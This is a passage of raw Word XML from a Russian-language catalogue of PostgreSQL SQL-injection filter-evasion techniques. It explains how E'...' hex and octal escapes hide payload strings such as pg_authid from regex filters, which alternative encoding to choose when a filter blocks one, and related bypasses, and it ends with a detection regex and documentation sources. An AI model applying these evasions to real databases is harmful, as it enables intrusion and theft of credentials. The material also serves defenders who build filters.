        <w:t>bytes</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:t>, и атакующий получит весь payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B2CE71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6C568" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — лексический префикс. Парсер PG распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед строковым литералом и включает escape-обработку (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:t>, и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEFE01A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Конкретные подстроки имени/значения скрыты в hex/octal-кодах: regex по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ничего не находит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F751D90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Octal-форма ортогональна hex-форме: фильтр на одну из них не закрывает другую.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBE82A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NUL-byte (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — единственный синтаксис в PG, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>может</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вставить NUL в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'\0000'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тоже работает, но 3.9.3 шире покрывает другой класс sanitizer-ов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D067EB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D37AB83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   E-strings — расширение PG к стандарту (стандарт SQL escape-sequences не поддерживает; PG позволяет либо через E-prefix, либо через GUC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>standard_conforming_strings = off</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB9E8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>standard_conforming_strings = on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с PG 9.1) — обычные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-литералы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрабатывают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNN</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; нужно явно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. До 9.1 (или при ручном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — backslash-escape был активен и в обычных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t>, что в legacy-коде создавало неожиданные SQL-injections; именно для отказа от этого поведения по умолчанию стандарт был принят за дефолт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE5886" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Поддерживаемые escape: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\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (1-3 octal), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (1-2 hex), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\uNNNN</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\UNNNNNNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Unicode). Документация: §4.1.2.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56C33A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NUL-byte (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) хранится в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как обычный байт, потому что PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это TOASTed varlen-структура с длиной, не C-string. Все операции над </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (substr, length, ||) корректно работают с NUL внутри. Только некоторые C-API libraries обрабатывают возвращаемые значения через NUL-terminated path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378C6AE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDE9CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.0+ (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — E-strings и hex/octal-escape с 8.0; Unicode-escape (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\uNNNN</w:t>
      </w:r>
      <w:r>
        <w:t>) в E-string — с 9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F14B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает везде. Это лексическая фича.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339C57C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC `standard_conforming_strings`:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с 9.1; почти везде в проде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если кластер сконфигурирован с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (legacy/совместимость) — escape-обработка применяется и к обычным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-литералам без E-prefix, что само по себе создаёт </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">дополнительные SQL-injection векторы (escape-байты в обычных litterals превращают, например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в перенос строки → 3.12.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59F134" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0787127D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Unicode-escape. Тот же класс задачи (кодировать содержимое в codepoint-ы), другой синтаксис. Выбор по фильтру: если режется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; если режется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCFA88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t>-конкатенация. Альтернативный путь — через function call, а не escape-литерал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F842B4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(decode('...', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:t>. Ещё компактнее для длинных строк (один hex-литерал на всю строку, без побайтовых escape).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DA7B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и переводы строк </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в комментариях. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'\r\n'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственный способ вставить literal CRLF в SQL-payload без использования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(13)||chr(10)</w:t>
      </w:r>
      <w:r>
        <w:t>. Главный синтаксис для атак на парсер комментариев.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B97547E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-8715 (newline в идентификаторе при pg_dump/restore). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'\n'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-атаки в значениях, попадающих в имена объектов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — точка пересечения с 3.16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77915749"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E['"]\\(x[0-9a-fA-F]|\d{3})</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет.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1DCE92EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E6FD8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — String Constants With C-Style Escapes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70996B80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: standard_conforming_strings GUC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDFB92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Character Types — text and NUL bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68E36F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
